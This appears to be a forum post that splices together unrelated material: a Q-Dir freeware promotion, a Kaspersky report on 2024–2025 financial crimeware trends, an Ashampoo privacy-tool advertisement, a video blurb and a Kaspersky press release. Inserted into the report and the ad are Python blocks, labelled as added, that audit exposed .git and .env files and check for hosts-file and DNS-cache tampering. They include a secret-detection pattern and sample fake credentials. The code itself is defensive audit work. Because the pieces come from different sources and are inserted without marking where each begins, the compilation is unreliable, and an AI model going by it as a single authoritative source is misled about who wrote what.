Posted by: mrtrout - 3 hours ago - Forum: Freeware - No Replies
https://www.softwareok.com/?Freeware/Q-Dir
The Quad-Directory-Explorer makes your files and folders easy to manage, either installed or as a portable Windows program, as a freeware alternative to Windows File Explorer.
Fast and easy access to your hard disks, with advanced file management for network folders, USB sticks, floppy disks and other storage devices. It is the most popular tool in the file management category on SoftwareOK!
Important! ► Add it as a trusted application under Windows 10 (2020, 2021)!
Key features in the alternative File-Explorer
◆ File management in 4-window with tabs
◆ Folder size with extra information
◆ Color filter for files and folders
◆ Classic and modern address bar
◆ Directory structure with visible tree branches
◆ Print what you see in Explorer Views
◆ Based on the MS Windows OS File Manager
◆ Full Unicode Support
Other options and specifications
◆ Save folder combinations as favorites
◆ Moving and copying the data via "drag and drop"
◆ Mark selected folders and files
◆ Small program great in file management
◆ Improved quad explorer file preview
◆ Multilingual
◆ Low System Resource usage
◆ Freeware
◆ ... and much more
https://www.softwareok.com/?Download=Q-Dir
Download: Q-Dir_Installer.zip <<<<< for Windows 829 K https://www.softwareok.com/?Download=Q-D...taller.zip
Q-Dir_Portable.zip <<<<< for Windows 830 K https://www.softwareok.com/?Download=Q-D...rtable.zip
Q-Dir 11.89 & PORTABLE Q-Dir 11.89 is 100% CLEAN, which means it does not contain any form of malware, including adware, spyware, viruses, trojans and backdoors. It was 100% scanned malware free & clean & safe with Kaspersky Standard.
Nov 18, 2024 #theSAS2024 #SecurityAnalystSummit #Kaspersky
Cybersecurity experts, global law enforcement, CERTs, CTF-players and industry leaders gathered in Bali, Indonesia, to spotlight key trends shaping cybersecurity's future.
Wanna get a taste of SAS? Check out our video!
Top investigations, top reports, top jaw-dropping revelations, top fun.
GReAT
Kaspersky’s Global Research and Analysis Team constantly monitors known and emerging cyberthreats directed at the financial industry, with banks and fintech companies being the most targeted. We also closely follow threats that aim to infiltrate a wider range of industries, namely ransomware families that are financially motivated.
These observations, as part of our Kaspersky Security Bulletin, help us devise predictions about how the financial cyberthreat landscape will change over the year. This report outlines notable attack trends we expect to face, to help businesses and individuals protect themselves from them. Let’s first look into our predictions for 2024 to see how they turned out, explore the key events in the financial cyberthreat landscape during the year, and then try to predict the trends for 2025.
How accurate were the 2024 predictions?
Increase in AI-powered cyberattacks
✅ True
The prediction that anticipated an upsurge in cyberattacks leveraging machine learning tools turned out to be true. In 2024, we saw cyberattacks boosted by AI emerge not only through emails, manipulated ads, phishing attacks (approximately 21% of phishing emails are now generated by AI) and other content, but also as an effective way to bypass biometric authentication. Machine learning tools allowed criminals to open new accounts using leaked data, impersonating the victims and bypassing security mechanisms used in the KYC (know-your-customer) process by manipulating and changing faces, videos, pictures, etc. Threat actors like Gringo 171 specialized in developing these tools, selling them to any criminal interested in bypassing biometric authentication. As an example, in one recent case, Brazilian Federal Police arrested criminals who were using AI-powered tools to open bank accounts for money laundering. They opened thousands of accounts, creating fake faces and easily bypassing biometric checks.
Fraudulent schemes targeting direct payment systems
✅ True
The prediction that cybercriminals would exploit direct payment systems like PIX, FedNow and UPI through clippers and mobile banking Trojans was confirmed. We saw the appearance of GoPIX, a banking Trojan in Brazil targeting the PIX real-time payment system and implementing clipboard monitoring as a way of changing keys and stealing payments. The same technique was used in a Trojan targeting Android devices. Other banking Trojan families have already implemented cryptocurrency-stealing functionality, either by targeting the sites directly or by intercepting the user’s clipboard.
While there haven’t been any major publicly reported fraud cases directly tied to the FedNow system as of October 2024, concerns about the potential for fraud remain high. FedNow, the Federal Reserve’s real-time payment service, allows for instant fund transfers, but its rapid nature can be exploited by fraudsters, especially in the form of authorized push payment (APP) fraud.
Regarding UPI, the national direct payment system of India, scammers spammed UPI IDs with multiple collect requests. It’s easy to crack a UPI ID as it is generally formed with the user’s mobile number followed by the UPI provider name. Scammers can obtain victims’ phone numbers, as they are widely used in public — for online shopping, in malls, restaurants and so on. Users have been getting many fraudulent money collect and autopay requests from Netflix, Google Pay, etc. in their UPI accounts. In some cases, these are authentic UPI autopay requests initiated by fraudsters from their Netflix accounts, making an unsuspecting user essentially pay for the scammer’s subscription.
Finally, we have noticed a rise in fake instant payment apps in Latin America, used to carry out different kinds of scams. In this context, cybercriminal groups are developing apps that convincingly mimic monetary transactions, displaying a fake receipt without any real connection to transactional systems, to trick sellers into engaging in illegal or loss-making transactions. These apps are sold on dark web forums to scammers who use them to make fake purchases on behalf of small businesses.
Global adoption of Automated Transfer Systems (ATS)
☑️ Partially true
The prediction suggested that attacks with mobile ATS will become adopted globally. While mobile banking Trojans using ATS were already a reality, their global adoption is still underway. One of the groups behind the development of a particular malware family using this technique in Brazil was planning to expand their attacks to Europe by launching a test version of the malware. However, before they had a chance to spread out, they were arrested following a Kaspersky notification to the Brazilian police.
Moreover, with Google continuing to restrict even further the Accessibility permission in newer Android versions, we believe it will be harder for malware in general to apply the ATS trick in future mobile banking Trojan developments, as this needs accessibility settings enabled.
Resurgence of the Brazilian banking Trojans
✅ True
The prediction that attacks by the Brazilian banking Trojans would become more extensive, and Grandoreiro would gain momentum, was confirmed. The Brazilian banking Trojans arose in 2024 as a global threat, targeting many countries and expanding their reach. The most prevalent families in 2024 have been Guildma, Javali, Melcoz and Grandoreiro (the Tetrade group). Other families are Banbra, BestaFera, Bizarro, ChePro, Casbaneiro, Ponteiro, and Coyote. Grandoreiro expanded to target more than 1,700 banks in 45 countries, on every continent, and even the arrest of several gang members didn’t stop them. In the top 30 banking Trojan families we detected worldwide, 11 are of Brazilian origin and account for 22% of all detections on our users in 2024 (according to the KSN statistics gathered from January to October 2024).
Ransomware target selection
✅ True
The prediction suggested that ransomware groups would turn to more targeted, highly selective attacks. In 2024, ransomware groups have intensified their focus on high-value targets, with larger organizations, particularly those whose revenue exceeds $5 billion, continuing to be the primary marks due to the likelihood of extracting higher ransoms from them. This trend aligns with a shift toward targeting financial services and especially banking institutions, with a marked increase in attacks. Banks alone accounted for 20% of ransomware incidents in this sector. The average ransom demand rose by $400,000 from 2023 to 2024, underscoring attackers’ pursuit of higher payouts. However, while the most skillful ransomware operators have homed in on high-profile sectors, other groups continue to strike broadly, impacting the government, healthcare, and education sectors. This dual approach drove a 21.5% rise in ransomware incidents from Q1 to Q2 2024 and a year-over-year increase of 4.3% in the first half of the year, suggesting that, despite a selective trend, ransomware still remains a widespread threat across industries.
Open-source backdoored packages
✅ True
The prediction anticipated a worrying increase in open-source backdoor packages, which we observed to be true. The XZ Backdoor was a major incident affecting Linux distributions when backdoored packages ended up inside popular OSS. We did an extensive analysis of this backdoor here, here and here. Unfortunately, it wasn’t the only one, as we saw many other similar incidents this year.
Decrease in 0-days, increase in 1-day exploits
❌ False
The prediction that crimeware actors would shift from zero-day to first-day exploits has proven inaccurate for 2024, as recent trends indicate a sustained and even heightened reliance on zero-day vulnerabilities. According to CVE.org, 28,961 vulnerabilities were registered in its catalog in 2023, while from January through November 2024 the program registered 29,004, the highest number ever recorded.
According to the Rapid7 2024 Attack Intelligence Report, the use of zero-day exploits has surged, with 53% of widely exploited CVEs recently beginning as zero-day attacks — a trend observed in two of the last three years. This focus on zero-days has been reinforced by the sophisticated and orchestrated nature of recent attacks, where 23% of widespread threat CVEs have been attributed to high-value zero-day vulnerabilities. The commercial market for zero-day exploits is also booming, with brokers offering significant payouts, such as up to $2 million for iPhone zero-days. In contrast, there is no evidence pointing to a rise in first-day exploit usage among crimeware actors, underlining that zero-day attacks remain a primary tactic in the cybersecurity threat landscape.
Exploitation of misconfigured devices and services
✅ True
The prediction regarding the exploitation of misconfigured devices and services has proved accurate in 2024, as evidenced by the EMERALDWHALE operation. This global campaign specifically targeted misconfigured Git setups, resulting in the theft of over 15,000 cloud service credentials and unauthorized access to more than 10,000 private repositories. The impact was extensive, compromising various services, including cloud providers and email platforms, which underscores the widespread nature of vulnerabilities relating to misconfiguration. Attackers used private, automated tools to scan, extract, and verify stolen tokens from misconfigured services, significantly expanding their reach and efficiency. This misconfiguration trend also exposed sensitive data stored in configuration files, such as Laravel’s .env files, and highlighted cloud storage vulnerabilities, such as a compromised Amazon S3 bucket containing over a terabyte of sensitive information.
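The two misconfigurations named in this section, a web-served .git directory and a readable Laravel .env file, can be audited with a few lines of code. The Python below is an added example and is not part of the Kaspersky report or of the EMERALDWHALE tooling it describes. The git config, the .env contents and every credential value in them are constructed samples, and the key-name pattern used to pick out secrets is an assumption about common naming, not an exhaustive list.

```python
"""Audit helpers for the misconfiguration class described above: an exposed
.git directory (whose config can embed credentials in remote URLs) and a
Laravel-style .env file served by the web root. All inputs are constructed."""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Constructed sample of a .git/config with a credential-bearing remote URL.
SAMPLE_GIT_CONFIG = """\
[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = https://deploy-bot:ghp_EXAMPLE0000000000000000000000000000@github.com/example-org/backend.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@gitlab.example.com:example-org/backend.git
"""

# Constructed sample of a Laravel .env that was left web-readable.
SAMPLE_ENV = """\
APP_NAME=Shop
APP_DEBUG=true
DB_PASSWORD=s3cret-db-pass
AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
MAIL_PASSWORD=
"""

# Assumed naming convention for credential-like variables (not exhaustive).
SECRET_KEY_RE = re.compile(r"(PASSWORD|SECRET|TOKEN|API_KEY|ACCESS_KEY)", re.I)


def git_head_exposed(body: str) -> bool:
    """True if an HTTP response body for /.git/HEAD looks like a real HEAD file
    (a symbolic ref or a bare 40-hex commit id) rather than an HTML error page."""
    text = body.strip()
    return text.startswith("ref: refs/") or re.fullmatch(r"[0-9a-f]{40}", text) is not None


def credentials_in_git_config(config_text: str) -> list[dict]:
    """Return remotes whose http(s) URL embeds user:password (or user:token)."""
    findings = []
    remote = None
    for line in config_text.splitlines():
        m = re.match(r'\s*\[remote "([^"]+)"\]', line)
        if m:
            remote = m.group(1)
            continue
        m = re.match(r"\s*url\s*=\s*(\S+)", line)
        if m and remote:
            parts = urlsplit(m.group(1))
            # scp-style SSH URLs have no scheme and carry no inline password.
            if parts.scheme in ("http", "https") and parts.password:
                findings.append({"remote": remote, "host": parts.hostname,
                                 "user": parts.username, "secret": parts.password})
    return findings


def secrets_in_env(env_text: str) -> dict[str, str]:
    """Return non-empty values of .env variables whose names suggest a credential."""
    found = {}
    for line in env_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip().strip('"').strip("'")
        if SECRET_KEY_RE.search(key) and value:
            found[key.strip()] = value
    return found


if __name__ == "__main__":
    print("HEAD exposed:", git_head_exposed("ref: refs/heads/main\n"))
    for f in credentials_in_git_config(SAMPLE_GIT_CONFIG):
        print(f"remote {f['remote']}: {f['user']}@{f['host']} with inline secret")
    for k in secrets_in_env(SAMPLE_ENV):
        print("secret variable in .env:", k)
```

Run git_head_exposed() on the body your server returns for /.git/HEAD; a positive result usually means the object store is downloadable too, so the whole history, including any .env that was ever committed, should be treated as disclosed. Any credential found this way needs to be rotated, not just deleted from the file.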
Fluid composition of affiliate groups
✅ True
The prediction suggesting a more fluid distinction between cybercrime groups has proven accurate. In 2024, the ransomware ecosystem has become increasingly dynamic and adaptable, with affiliates adopting a “multi-platform” approach. Many threat actors are now working with multiple ransomware families simultaneously, allowing them to optimize their operations and mitigate risks associated with relying on a single group. For instance, cybersecurity researchers have observed affiliates actively participating in campaigns for different ransomware families, switching between groups like BlackMatter, and newly emerged ones, such as RansomHub. This strategic approach allows them to maintain a constant stream of attacks by leveraging different ransomware strains depending on the target, potential payout, and current operational status of each RaaS platform. The fragmentation of the ransomware landscape is evident, with the number of groups listing victims rising from 43 to 68 and the emergence of 31 new groups in the past year alone. This decentralization complicates law enforcement efforts, as tracking and containing these groups has become more challenging due to their agile structure and international reach. Smaller groups like Medusa and Cloak are capitalizing on this fluid environment, offering attractive profit-sharing on dark web resources to draw affiliates. For example, Medusa is offering up to 90% profit-sharing to attract affiliates, while Cloak allows affiliates to join without any initial payment. Meanwhile, established platforms continue to evolve their offerings to retain and attract skilled operators.
Adoption of less popular / cross-platform languages
✅ True
The prediction anticipated that cybercriminals would turn to lesser-known programming languages to evade detection. Multiple threats have emerged from the adoption of fairly new or non-standard programming languages used for malware development. Tooling like KrustyLoader (a loader implant written in Rust), NKAbuse, or even K4Spreader (a loader used by 8220 Gang and written in Golang) has been caught in the wild. Moreover, we saw Trojan spies, banking Trojans and other financially motivated malware developed in Go. These are a clear signal that malware developers make use of these languages not only because of their practicality and easy portability to different OSs, but also because they make analysis a more strenuous task.
Emergence of hacktivist groups
✅ True
The prediction that saw the rise of hacktivist groups due to global conflicts proved to be true. The hacktivist scene got only bigger and stronger. The presence of new groups in different parts of the world and the increase in surrounding conflicts offer a fertile ground for hacktivism. Currently, groups such as CiberInteligenciaSV, a Salvadoran hacktivist group created in early 2024, can reach up to two or three leaks per day. SiegedSec and GhostSec are two hacktivist groups that are part of an alliance called The Five Families. They continue to attack critical infrastructure, such as ICS/SCADA and GNSS satellite receivers, in various countries, mainly in conflict zones associated with current geopolitical events.
Crimeware predictions for 2025
Upsurge in stealer activity
Victims’ information gathered through stealer attacks will lead to an increase in crime: either cybercrime or traditional crime. Lumma, Vidar, RedLine and others will survive disruptive operations by law enforcement, adapt and adopt new techniques. New players among stealer families will appear.
Attacks against central banks and open banking initiatives
Central banks are responsible for implementing and running instant payment systems, CBDCs (central bank digital currencies), transferring gigabytes of data among financial entities through open banking initiatives, etc. This will make central banks an interesting target for cybercriminals. Open banking systems rely heavily on APIs to allow the sharing of data. APIs can be vulnerable to abuse, where attackers manipulate API endpoints to gain unauthorized access to sensitive data. We expect the number of attacks targeting central banks and open banking APIs to rise significantly over the year.
Increase in supply chain attacks on open-source projects
In the wake of the XZ backdoor incident, the open-source community began to check every commit in OSS projects more thoroughly. This increased vigilance is likely to uncover both new attempts and previously successful backdoors implanted through malicious commits. Furthermore, a high success rate and associated impact increase the popularity of this tactic.
New blockchain-based threats
The ever-growing use of blockchain in new technology and the increasing adoption of cryptocurrency as a means of payment makes blockchain-related threats a fertile field. New protocols emerge with a need for a secure and private network based on blockchain and peer-to-peer communications, which eases the distribution and diverse usage of new malware based on these obscure protocols. This comes tied to the increasing use of modern programming languages like Go and Rust, languages that are chosen by these blockchain-based protocols to develop their SDKs, and we expect the trend of using these languages for malware development to continue.
Expansion of Chinese-speaking crimeware worldwide
We saw several crimeware families of Chinese origin covertly emerge, targeting users outside their common area of attack, Asia, and switching to users in Europe and LATAM, mainly through Android banking Trojans and phishing campaigns that aim to clone credit cards. But we also saw some advanced attacks such as DinodasRAT. We expect an even more noticeable expansion of Chinese crimeware to other countries and markets as it explores new opportunities and increases the frequency of its attacks.
Synthetic data poisoning through ransomware
Ransomware will turn to modifying victims’ data or injecting invalid data into targeted infrastructures, rather than merely encrypting. This “data poisoning” technique will make it more difficult or impossible to recover businesses’ original data assets even after decryption.
Quantum-resistant ransomware
Advanced ransomware groups will start using post-quantum cryptography as quantum computing evolves. The encryption techniques used by this “quantum-proof” ransomware will be made to resist decryption attempts from both classical and quantum computers, making it nearly impossible for victims to decrypt their data without having to pay a ransom.
Weaponization of regulatory compliance by ransomware attackers
Attackers will examine a targeted company’s regulatory responsibilities and purposefully encrypt or alter data in ways that may result in serious compliance violations. The attackers will then add additional financial and legal pressure to the extortion scheme by threatening to alert regulators if their demands are not met.
Ransomware-as-a-service proliferation
The RaaS model will continue to make it easier for cybercriminals to design and execute attacks. Less experienced actors will be able to launch sophisticated attacks with kits as inexpensive as $40, increasing the number of incidents.
More AI and machine learning on the defense side
Today, numerous cybersecurity solutions already leverage artificial intelligence to address common vulnerabilities, such as configuration errors, alert handling and more. In the future, we will see AI increasingly adopted in cyberdefense to accelerate anomaly detection, reduce the duration of analysis through predictive capabilities, automate response, and strengthen policies to counter emerging threats. AI will accelerate detection and bolster defenses against evolving threats. This shift is backed by a significant increase in real-time machine learning applications, which are reshaping cyberdefense by enhancing adaptability and reducing manual workloads. As threat actors also turn to AI, the stakes rise for defenders to evolve equally advanced, adaptive strategies.
Upsurge in financial cyberattacks targeting smartphones
We see that while the number of attacks on PCs using traditional banking or financial malware is decreasing, financial cyberthreats for smartphones are on the rise: the global number of users who encountered mobile financial threats in 2024 increased twofold (by 102%) compared to 2023. We expect this number to grow further, capturing the attention of both malicious actors and potential victims.
https://content.kaspersky-labs.com/se/me...asheet.pdf
Kaspersky Crimeware Intelligence Reporting
Evolving threats
The world of crimeware threats is constantly evolving. Crimeware refers to malicious programs specifically designed to commit financially-motivated cybercrime. The most infamous example is ransomware – programs which block access to data or disrupt a computer’s performance. There are no limits to the imagination of cybercriminals, who are coming up with ever-more sophisticated ways to gain and monetize their access to their target’s systems, accounts and data.
Introduction
Financially-motivated cybercrime is not limited to specific industries. And while attacks on financial infrastructures like ATMs and PoS (Point of Sale) devices continue, all enterprises in every sector are at risk from ransomware. Over the last couple of years, there has been a blurring of boundaries between different types of threats and different types of threat actors. This includes the emergence of advanced persistent threat (APT) campaigns focused not on cyberespionage, but on theft – stealing money to finance other activities that the APT group is involved in. We should not underestimate the growing sophistication of crimeware threats.
Kaspersky Crimeware Intelligence Reporting enables organizations to inform their defensive strategies by providing timely information on malware campaigns, attacks targeting financial institutions and information on crimeware tools used to attack banks, payment processing companies and their specific infrastructures.
- Detailed descriptions of popular, widespread and highly-publicized hyped malware
- Researcher notes/early warnings, including information on new and updated malware threats
- Information on dangerous, widespread malware campaigns
- Detailed descriptions of threats targeting financial infrastructures and the corresponding attack tools being developed or sold by cybercriminals on the Dark Web in various
Windows collects extensive usage data, and browsers track every online activity. Ashampoo Privacy Inspector 2 empowers you to take control of this data. The software provides detailed insights into which objects were used, when, and how often, offering various filters for clear data display. It allows for precise analysis of browsing behavior across all user profiles on a PC, covering everything from visited pages to top search terms and login timestamps. Browsing behavior can be viewed in lists or tree structures, with the option to delete data as needed. Downloads, searches, and logins are transparently displayed and fully filterable across major browsers like Chrome, Firefox, and Edge. Ashampoo Privacy Inspector 2 introduces a new activity module to track key events, along with a DNS cache module that offers detailed connection information and a simple delete function. Internet Cleaner supports the latest browser versions and includes a deletion history, while File Wiper ensures the permanent, secure erasure of sensitive data. Additionally, the software provides enhanced privacy settings for Windows and apps, optimized search term tracking from browsers and Windows Explorer, and improved performance through efficient memory management and multi-core support.
- Activities module reveals all significant events
- DNS Cache module with detailed display and clearing function
- Internet Cleaner with deletion history and support for the latest browser versions
- File Wiper for permanently deleting sensitive data
- Numerous new privacy settings for Windows and apps
- Search term logging for all browser profiles and Windows Explorer
- Optimized performance through memory management and multi-core support
System requirements
Operating System:
Windows 11, Windows 10 (x64)
Supported Browsers:
Mozilla Firefox, Google Chrome, Microsoft Edge Chromium
Requirements
Any device that supports the operating systems listed above.
Other
Screen resolution 1280x768 (Recommended: 1920x1080 )
Full administrative rights are required to use the program. An Internet connection is required to activate the program. The program license is verified repeatedly at regular intervals.
Windows collects data about your usage habits and what you do online. But what exactly is being recorded, and what can you do about it? From detailed evaluations of all PC activities, a look into the DNS cache, to comprehensive security settings–everything is revealed! Ashampoo Privacy Inspector 2 offers fascinating insights into the inner workings of Windows, including activities that are being logged, and returns maximum privacy back to you!
View used objects neatly arranged
Safely delete confidential usage data
Analyze web browsing behavior for all user accounts
Multiple search filters for fast and precise results
Display page visits by time and frequency
Retrace online activities in detail
Delete what other cleaners leave behind
Review and delete download history
Analyze online search behavior and identify top search terms
Keep an eye on logins and form inputs
Erase internet traces and usage logs
Disable telemetry and unwanted data sharing
Safeguard and protect your data and privacy
Limit usage rights for apps
Prevent location tracking, data syncing, and personalized ads
Comprehensive PC monitoring with Activities module
The new Activities module provides a comprehensive overview of all significant events on your PC. From running .exe files, opening files and folders, to installing or updating software–nothing escapes your attention! Learn exactly when the system was started or shut down, which user logged in or out, and if and when software errors occurred. Even default system events and background tasks are fully revealed to you. This powerful tool offers a detailed log of all your PC activities!
View and clear DNS cache
Did you know that your computer stores the IP addresses of visited websites in the DNS cache to speed up loading times? This makes browsing faster, but entries can become outdated or be manipulated during an attack (DNS spoofing). With the new DNS Cache Module, you stay in control! Not only can you view the cache in detail but also easily clear it when problems arise. You can even check the similarly structured hosts file. This ensures up-to-date connections and protects you from potential security risks!
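The paragraph above describes a check a user makes by hand in the product; below is an added Python example of the same check done programmatically. It is not part of Ashampoo Privacy Inspector. The hosts file content and the ipconfig /displaydns excerpt are constructed samples; the displaydns parser follows the record layout that command prints on Windows, and the watched-domain set and expected-address table are assumptions you would fill in from your own records.

```python
"""Checks for the two local name-resolution tampering points mentioned above:
the hosts file and the resolver cache as printed by `ipconfig /displaydns`.
All inputs below are constructed samples, not real captures."""
from __future__ import annotations

import ipaddress
import re

# Constructed hosts file: benign localhost lines, one override of a bank
# domain (the classic pharming edit) and one localhost sinkhole for an ad host.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.45    online.examplebank.com www.examplebank.com
0.0.0.0         ads.example.net
"""

# Constructed excerpt in the layout ipconfig /displaydns uses on Windows.
SAMPLE_DISPLAYDNS = """\
Windows IP Configuration

    update.example-vendor.com
    ----------------------------------------
    Record Name . . . . . : update.example-vendor.com
    Record Type . . . . . : 1
    Time To Live  . . . . : 120
    Data Length . . . . . : 4
    Section . . . . . . . : Answer
    A (Host) Record . . . : 198.51.100.7

    www.examplebank.com
    ----------------------------------------
    Record Name . . . . . : www.examplebank.com
    Record Type . . . . . : 1
    Time To Live  . . . . : 60
    Data Length . . . . . : 4
    Section . . . . . . . : Answer
    A (Host) Record . . . : 192.0.2.10
"""

DNS_NAME_RE = re.compile(r"Record Name[ .]*:\s*(\S+)")
DNS_ADDR_RE = re.compile(r"(?:A \(Host\)|AAAA) Record[ .]*:\s*(\S+)")


def parse_hosts(text: str) -> list[tuple[str, str]]:
    """Return (ip, hostname) pairs from hosts-file text, ignoring comments."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            pairs.append((fields[0], name.lower()))
    return pairs


def hosts_overrides(pairs, watched: set[str]) -> list[tuple[str, str]]:
    """Entries that steer a watched domain (or a subdomain of it) to a routable
    address. Loopback/unspecified targets are sinkholes, not redirections."""
    hits = []
    for ip, name in pairs:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue
        if addr.is_loopback or addr.is_unspecified:
            continue
        if any(name == d or name.endswith("." + d) for d in watched):
            hits.append((ip, name))
    return hits


def parse_displaydns(text: str) -> dict[str, list[str]]:
    """Map each cached name to the addresses in its A/AAAA records."""
    cache: dict[str, list[str]] = {}
    current = None
    for line in text.splitlines():
        m = DNS_NAME_RE.search(line)
        if m:
            current = m.group(1).lower()
            cache.setdefault(current, [])
            continue
        m = DNS_ADDR_RE.search(line)
        if m and current:
            cache[current].append(m.group(1))
    return cache


def cache_mismatches(cache: dict[str, list[str]],
                     expected: dict[str, set[str]]) -> list[tuple[str, str]]:
    """(name, ip) pairs where a cached answer lies outside the address set you
    expect for that name (from your own authoritative lookups or change records)."""
    out = []
    for name, ips in cache.items():
        if name in expected:
            out += [(name, ip) for ip in ips if ip not in expected[name]]
    return out


if __name__ == "__main__":
    print(hosts_overrides(parse_hosts(SAMPLE_HOSTS), {"examplebank.com"}))
    print(cache_mismatches(parse_displaydns(SAMPLE_DISPLAYDNS),
                           {"www.examplebank.com": {"198.51.100.20"}}))
```

On Windows the structured equivalent of the text parse is Get-DnsClientCache in PowerShell, and Clear-DnsClientCache (or ipconfig /flushdns) discards a bad answer only until the next query reaches the same resolver, so a mismatch found here should be followed by checking which DNS server the client is actually configured to use.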
Heightened data and OS security
In the Privacy section, you will find numerous new settings to configure Windows, apps, and browsers to be more secure and discreet. Internet Cleaner has been further enhanced: Deleted items now appear in a history, and the latest browser versions are optimally supported. Also new is File Wiper, which allows you to permanently delete sensitive data and folders. Even with specialized software, these files cannot be restored, ensuring your privacy remains intact!
Retrace your steps online
There are times when you need to retrace your most recent activities on the internet. How did you end up on that page and what were you looking for? Ashampoo Privacy Inspector helps you to analyze web sessions with extensive list or tree views that cover all of your online activities. Bring your web browsing history to life and never lose the thread again.
More under-the-hood improvements
Search terms are now logged not only from all browsers and user profiles but also Windows Explorer. You can now access all data across profiles and use handy filters for better organization. Thanks to optimized memory management and new multi-core support, Ashampoo Privacy Inspector 2 works more smoothly than ever before, even during extensive analyses!
Which objects were used, how often were they accessed, and when?
Usage-related information about open files and folders is constantly gathered without your notice. Wouldn't you like to know how much information about your work gets logged by your PC? Ashampoo Privacy Inspector will tell you! Find out exactly what is going on behind the scenes while you're using your computer, use filters to narrow down results, and delete them at your leisure!
How much does your PC know about your web browsing habits? You'll be surprised...
You may be using adblockers, VPNs, and other means to browse the web anonymously, but you'll still leave telltale traces about search terms, form inputs, and visited websites on your PC! Use Ashampoo Privacy Inspector to review not just your traces but those of anyone else using your computer. Apply filters to focus on what's relevant to you, sift through data from Chrome, Edge, and Firefox with ease, and delete anything you don't want recorded!
Download and search history reloaded, literally
Take full control of your download and search history. Online source, file size, download time, with Ashampoo Privacy Inspector, all the information you need is right there at your fingertips–not just for you but for anyone else using your computer! But no worries, built-in filters will help you to identify, and delete, sensitive information in no time. Want to revisit a recent page but forgot how to get to it? Ashampoo Privacy Inspector will help you with that, too!
Logins and browsers
A lot of sites require us to log in with dedicated user names and passwords these days. So where did you leave your credentials today? Exactly what information did you enter into forms and how often have you visited the affected pages? Enjoy 100% transparency and precision with Ashampoo Privacy Inspector today!
More privacy for you
Ashampoo Privacy Inspector comes with everything you need to curb the excessive data collection by Windows. Disable telemetry and location services, turn off password syncing, and shut up Cortana. And, in case you're using a tablet to use your handwriting with Windows, you may want to know that Windows also sends out samples of your handwriting, so make sure to turn that off, too! It only takes a few clicks.
Eliminate web browsing traces
If you like it brief and clear-cut, you'll love the built-in overview. It has all the cached files, cookies, and session-related information you need. Feel free to whitelist important cookies and delete the rest to clear up space!
Recover deleted files
Speaking of deleting data: Have you ever accidentally deleted an important file? Ashampoo Privacy Inspector can recover it for you! Pick a drive, and the program will neatly list all deleted files–along with the ability to recover them individually. It's a lifesaver!
Oct 19, 2024 ✪ Members first on October 19, 2024
Best Antivirus vs Unknown Ransomware Part II: In this video we test Kaspersky vs Bitdefender vs ESET vs Malwarebytes. Previous video with Crowdstrike, MS Defender, Sentinel One etc: • Best Antivirus/EDR vs Unknown Ransomware
https://www.kaspersky.com/about/press-re...-in-bogota Kaspersky strengthens trustworthiness commitment with new Transparency Center in Bogotá
November 14, 2024
Kaspersky today announced the opening of its new Transparency Center in Bogotá, Colombia, reinforcing its commitment to trust and transparency in the region. Launched within the framework of Kaspersky’s signature Global Transparency Initiative (GTI), the center will provide visitors with services ranging from an overview of the company’s transparency practices to its source code review, further demonstrating the integrity of Kaspersky’s solutions and practices.
Kaspersky’s GTI highlights its commitment to enhance trust in the company’s solutions and help its partners and customers mitigate supply chain risks with confidence. Launched in 2017, the initiative aims to open up the “black box” of cybersecurity technology by engaging with stakeholders and the broader community in verifying the trustworthiness of the company’s products, internal processes, and business operations. As part of the GTI development, Kaspersky is the first cybersecurity vendor to open its source code for external review.
The new Transparency Center will work on the premises of Kaspersky’s new office in Bogotá, established in August 2024 with the view to further strengthen the company’s presence in the country and the region. The facility in Bogotá becomes the company’s second center in the region in addition to the one in São Paulo, Brazil, opened in 2019.
Just as at the São Paulo center, visitors of the Bogotá center will be able to choose one of three review options for their visit, depending on the depth of security assessment needed:
· “Blue piste” offers a general overview of the security development processes of Kaspersky products and services, as well as its data management practices;
· “Red piste” allows for a review of the most critical aspects of source code, assisted by the company’s specialists, and provides a targeted analysis of a particular functionality;
· “Black piste” enables visitors to conduct the most comprehensive and thorough source code reviews, with the help of Kaspersky’s experts.
During a Transparency Center visit, guests can also examine the company’s secure software development documentation, which includes threat analysis, secure code review, application security testing processes, and the Software Bill of Materials.
"Kaspersky is proud to strengthen its commitment to transparency and trust for customers, business partners, and local regulators in Bogotá with the launch of the company’s Transparency Center in the country," said Daniela Alvarez de Lugo, General Manager for NOLA at Kaspersky. "Expanding our presence in Colombia reinforces our constant dedication to openness, allowing stakeholders to examine our products, practices and processes, and fostering greater confidence in our cybersecurity solutions."
Leading the cybersecurity industry in transparency efforts, Kaspersky currently employs 150 staff across the Latin American region, including local members of the Global Research and Analysis Team who analyze and counter cybersecurity threats on the continent, further fostering trust through secure infrastructure and transparency-focused services.
In addition to Transparency Centers, since its launch, Kaspersky’s GTI has also introduced additional mechanisms to enhance digital trust and promote greater accountability in the cybersecurity field. These include the relocation of cyberthreat-related data storage and processing to Zurich, Switzerland; independent third-party reviews of internal processes and engineering practices, for instance the recently renewed SOC 2 audit; the launch of a security training Cyber Capacity Building Program; and increasing bug bounty rewards up to US$100k (for the most critical vulnerabilities found in Kaspersky’s products). It also includes the release of Transparency Reports, which consist of two parts and reveal information on requests received from government and law enforcement agencies, and from users, for their personal data.
To learn more about Kaspersky’s Global Transparency Initiative or to request a visit to the Transparency Center in Bogotá, please check the website.
About Kaspersky
Kaspersky is a global cybersecurity and digital privacy company founded in 1997. With over a billion devices protected to date from emerging cyberthreats and targeted attacks, Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection, specialized security products and services, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats. We help over 200,000 corporate clients protect what matters most to them. Learn more at www.kaspersky.com.
